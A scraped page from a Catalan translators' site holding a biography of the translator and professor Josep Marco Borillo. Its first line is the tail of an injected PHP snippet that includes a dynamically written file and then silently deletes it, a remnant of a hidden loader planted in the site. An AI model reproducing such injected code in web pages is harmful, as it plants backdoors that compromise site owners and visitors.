");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Josep Marco Borillo
Facebook Twitter
Portada > L’espai dels traductors > Josep Marco Borillo

Josep Marco Borillo

Visat núm. 23
(abril 2017)
Josep Marco Borillo (les Alqueries, Plana Baixa, 1963) és llicenciat en Filologia Anglesa per la Universitat de Barcelona (1986) i doctor en Traducció i Interpretació per la Universitat Jaume I (1998).
En acabar la llicenciatura, va treballar sis anys com a professor d’anglès en l’ensenyament mitjà. Mentrestant, anava fent els cursos de doctorat i pensant en la tesi. El 1992 va ser contractat com a professor ajudant per la Universitat Jaume I de Castelló, on ha desenvolupat la seua carrera acadèmica. El 1998 va defensar la seua tesi doctoral, titulada Anàlisi estilística i traducció literària: el cas de la traducció al català de The Sea and the Mirror, de W. H. Auden. Des de 2012 exerceix com a catedràtic i imparteix docència relacionada principalment amb la traducció literària.

Quant al vessant acadèmic, les seues principals línies d’investigació són la traducció de l’estil, els estudis traductològics basats en corpus electrònics, la didàctica de la traducció literària i les traduccions al català durant l’època d’entreguerres i l’actual. Entre els treballs que ha publicat destaca el llibre El fil d’Ariadna. Anàlisi estilística i traducció literaria) Eumo, 2002), així com diversos articles publicats en revistes especialitzades i alguns capítols inclosos en volums col·lectius. És membre del grup COVALT (Corpus Valencià de Literatura Traduïda), de la Universitat Jaume I, que ha compilat un corpus multilingüe de traduccions literàries al català valencià dels anys 1990-2000, i del grup TRILCAT (Estudis de Traducció, Recepció i Literatura Catalana), de la Universitat Pompeu Fabra.

Com a traductor, és responsable tant de traduccions pròpies com de col·lectives, fetes per estudiants de Traducció i Interpretació de la Universitat Jaume I i coordinades per ell, sempre en les combinacions lingüístiques anglès-català i anglès-espanyol. Entre els autors que ha traduït o dels quals ha coordinat traduccions hi ha W. H. Auden, Mark Twain, Washington Irving, Herbie Brennan, Joseph Conrad, Edgar A. Poe, George Eliot, Robert L. Stevenson, A. Conan Doyle, Charles Dickens, Howard P. Lovecraft, Edward Gibbon, Gerald Brenan, Oscar Wilde, Herman Melville o Henry James. No ha perdut, malgrat el pas dels anys, inexorable, la passió pels fets de llengua, literatura i traducció, sense els quals seria una altra persona.

Amb el suport de: